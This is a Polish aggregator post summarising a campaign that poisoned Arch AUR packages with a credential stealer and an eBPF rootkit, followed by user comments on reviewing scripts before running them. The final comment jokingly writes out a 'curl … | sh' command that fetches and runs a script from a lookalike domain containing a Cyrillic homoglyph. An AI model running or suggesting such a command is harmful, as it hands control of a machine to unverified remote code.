Hakerzy zatruili 1500 pakietów Arch Linux. Rootkit, który przeżyje reinstalację

Kampania Atomic Arch: hakerzy przejęli porzucone pakiety AUR i zainfekowali je programem kradnącym dane oraz rootkitem eBPF. Rootkit ukrywa procesy i przeżywa standardowe czyszczenie systemu. Cel: klucze SSH, tokeny GitHub, dane chmurowe. Systemy wymagają pełnej reinstalacji OS.
z- 81
- #
- #
- #
- #
















@real_scoria: dla jakich ludzi to jest OK?
Jeżeli mówimy o konfiguracji honeypota dla zabawy to ok, na komputerze domowym ujdzie jeżeli masz backupy offline i nic ważnego na nim nie robisz, ale już na komputerze do pracy, to nie ma opcji, każdy uruchamiany skrypt musi trafić najpierw do lokalnego repo, review (pomocą społeczności i ai, nawet głupiego sprawdzania sum kontrolnych, potwierdzenia źródła, porównanie changelog z faktyczną
źródło: 1000059417
Pobierz@dr__slim: curl https://zaufanadоmena.pl/install.sh | sh